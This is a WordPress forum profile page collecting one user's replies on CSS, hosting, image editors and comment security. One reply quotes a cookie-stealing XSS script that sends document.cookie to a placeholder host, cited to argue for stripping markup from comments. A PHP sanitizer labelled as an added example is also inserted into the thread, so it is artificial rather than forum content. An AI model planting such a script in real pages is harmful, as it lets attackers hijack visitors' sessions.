deko
Forum Replies Created
Forum: Your WordPress
In reply to: New Music Blog Network
I like the way you put the number of comments next to the entry title.
I also like the way the tab highlights (not just the text) when you hover over Home, About, etc.
I still have not figured out how you did this –
<div id="nav"><a href="http://www.soundchronicle.com">HOME</a><a href="http://www.soundchronicle.com/about">ABOUT</a>
okay, fine…
And for CSS:
#nav a:hover {
background-color: #f7f7f7;
color: #6B81A3;
padding: 5px;
margin-right: 10px;
}
How does this light up the entire tab?
As for your color scheme, you might try a shade of red rather than the green, but that’s just preference.
Forum: Installing WordPress
In reply to: 1 and 1 hosting database error
Yeah, that was more of a visceral reaction to the name 1and1…
My guess, FatherAzerun, is that it’s a matter of getting the path correct. On my host I have a pathing scheme like this:
/home/username/public_html/mydirectory/myscript.php
Goodness knows what 1and1 uses for a pathing scheme.
Forum: Installing WordPress
In reply to: 1 and 1 hosting database error
1 and 1?? Sorry to hear of your misfortune. I too got ripped off – the only advice I can offer is get out… if you can…
whaddya know, I found a copy of Photoshop 6 on my hard drive 🙂
First impressions: bloatware (even wants a separate hard drive for a “scratch disk”); packed with features (there’s a cottage industry of training providers to show you how to use them); geared toward desktop publishing; includes a companion program, “ImageReady”, that apparently does what the Fireworks Optimize panel does.
Photoshop is likely the program of choice for guys with berets, ponytails and high-end Macs who create print advertising. Fireworks, on the other hand, is streamlined for creating and editing images for the web.
I think I’ll withdraw my prediction of the merger of these two programs. They are clearly for two different audiences.
Fireworks = $299 (149 upgrade)
Photoshop = $649 (169 upgrade)
@whooami – what can I do with Photoshop that I can’t do with Fireworks? (just curious)
Since Adobe now owns Macromedia, they’re probably going to merge the two – “Photoworks” or something. (this is why I have not upgraded from Fireworks 7)
I doubt they’ll mess with Dreamweaver – it’s way too popular.
@lhk – yes, that slicer tool is great. it foils image snatchers and gives the perception of faster download time. if the user sees a section of a sliced image start downloading after 1 second, that’s the perceived load speed, even if it takes a complete 10 seconds to download the entire image.
I’ve never used Photoshop… been using Fireworks and Dreamweaver for years – the best web development tools out there, IMHO. I think Fireworks might be a little cheaper than Photoshop.
If ya wanna play, ya gotta pay.
Forum: Fixing WordPress
In reply to: Text allign
To split a line of text so the first few words are aligned left and the last few words are aligned right – what I’ve done in the past is use a table.
Forum: Fixing WordPress
In reply to: How to make comments safe?
I did some testing with the kses file, and yes, it appears that unfiltered_html is allowed only for Admins and Editors.
I commented the <em> tag (from @allowedtags) and then tried marking up a comment with it to see if it had any effect – it didn’t, unless I was logged in as Admin (indicating that html was filtered by kses otherwise).
So kses is protecting us.
kses doesn’t catch unclosed tags in comments, but this is not a security problem.
Forum: Fixing WordPress
In reply to: How to make comments safe?
I don’t know enough about XSS to test for a vulnerability, but I’m going to use HTML_Safe anyway, if only to squash the ‘unclosed tag in comments’ bug.
I looked for codex documentation explaining why WP blogs are safe from XSS and other malicious code submitted in comments. I found this:
unfiltered_html
Allows – if enabled – the user to post HTML markup or even Javascript code in posts, pages or comments.
Note: Enabling this option for non-privileged users may result in their posting malicious code to your blog.
http://codex.wordpress.org/Roles_and_Capabilities#Editor
I don’t know if unfiltered_html is disabled by default, but unless there’s some documentation assuring us that we’re safe, it’s best to assume we’re not.
Forum: Fixing WordPress
In reply to: How to make comments safe?
This is a better site to download HTML_Safe:
http://pixel-apes.com/safehtml
I’ve tested and verified that a bug exists in 2.0.2, namely, that an unclosed markup tag, submitted in a comment, will affect the appearance of text outside of that comment, thus altering the display of your blog.
But the more important question remains:
Are WP blogs at risk of cross-site scripting (XSS) when users submit malicious code in the Comments form?
Forum: Fixing WordPress
In reply to: How to make comments safe?
This looks promising:
http://pear.php.net/package/HTML_Safe
But the first line of the script is this:
// requires HTMLSax3 package
require_once 'XML/HTMLSax3.php';
Does anyone know how to verify if my host’s server has the HTMLSax3 package installed?
Can this be verified using phpinfo.php?
Forum: Fixing WordPress
In reply to: How to make comments safe?
<script>
var url = 'http://www.mysite.com/send_me_passwords.cgi';
url = url + '?cookie=' + escape(document.cookie)
document.write('<script src="'+url+'">');
</script>
from: http://iamcal.com/publish/articles/php/processing_html/
I think it would be best to disallow all markup in comments to avoid any risk.
This plugin:
http://www.chweng.idv.tw/blog/wordpress/comment-without-tags/
Is supposed to:
“Strip all HTML tags in comments to prevent malicious or malformed tags from destroying your pages”
I have not tested it. I downloaded it and it’s only one script that appears to reference a non-existent function.
What we need is built-in comment scrubbing.
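A sketch of the kind of comment scrubbing discussed in this thread, as an added example that is not part of the original posts and is not the kses or HTML_Safe code: it keeps only allowlisted tags and attributes, drops script-bearing markup such as the snippet quoted above, and closes tags the commenter left open. The allowlist, the function names and the sample comments are assumptions constructed for illustration.

```php
<?php
// Added example: not kses, not HTML_Safe. Allowlist and sample comments are constructed.
const ALLOWED = ['a' => ['href'], 'em' => [], 'strong' => [], 'code' => []];

function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES, 'UTF-8');
}

function sanitize_comment(string $html): string {
    $out = '';
    $open = [];  // stack of allowlisted tags that are currently open
    $tokens = preg_split('/(<[^<>]*>)/', $html, -1, PREG_SPLIT_DELIM_CAPTURE | PREG_SPLIT_NO_EMPTY);
    foreach ($tokens as $tok) {
        if (!preg_match('/^<(\/?)([a-z][a-z0-9]*)(\s[^>]*)?>$/i', $tok, $m)) {
            $out .= esc($tok);  // plain text or a malformed tag: display it literally
            continue;
        }
        $tag = strtolower($m[2]);
        if (!array_key_exists($tag, ALLOWED)) {
            continue;  // well-formed tag that is not allowlisted (script, iframe, ...): drop it
        }
        if ($m[1] === '/') {
            if (in_array($tag, $open, true)) {
                do {  // close anything that was opened inside this element first
                    $top = array_pop($open);
                    $out .= "</$top>";
                } while ($top !== $tag);
            }
            continue;  // a closing tag with no matching open tag is dropped
        }
        $attrs = '';
        preg_match_all('/\s([a-z-]+)\s*=\s*"([^"]*)"/i', $m[3] ?? '', $pairs, PREG_SET_ORDER);
        foreach ($pairs as $p) {
            $name = strtolower($p[1]);
            $value = html_entity_decode($p[2], ENT_QUOTES | ENT_HTML5, 'UTF-8');
            if (!in_array($name, ALLOWED[$tag], true)) continue;  // e.g. onclick, style
            if ($name === 'href' && !preg_match('#^(https?://|mailto:)#i', $value)) continue;
            $attrs .= " $name=\"" . esc($value) . '"';
        }
        $out .= "<$tag$attrs>";
        $open[] = $tag;
    }
    while ($open) {  // the unclosed-tag fix: close whatever the commenter left open
        $out .= '</' . array_pop($open) . '>';
    }
    return $out;
}

echo sanitize_comment('nice <em>post'), "\n";
echo sanitize_comment('<a href="javascript:alert(1)" onclick="x()">hi</a><script>x</script>'), "\n";
```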
Forum: Installing WordPress
In reply to: Ideal Hosting Envronment For WordPress
The classic LAMP configuration is hard to beat. If you’re doing stuff like a web portal, web services, transaction processing, then I’d look at ASP.NET. For a WP blog, LAMP is a better fit and probably cheaper to host.
Forum: Themes and Templates
In reply to: Does this design display correctly?
One thing you might also consider is the page size. At 1253kb you are effectively barring all but the most patient of users that have dial-up connections.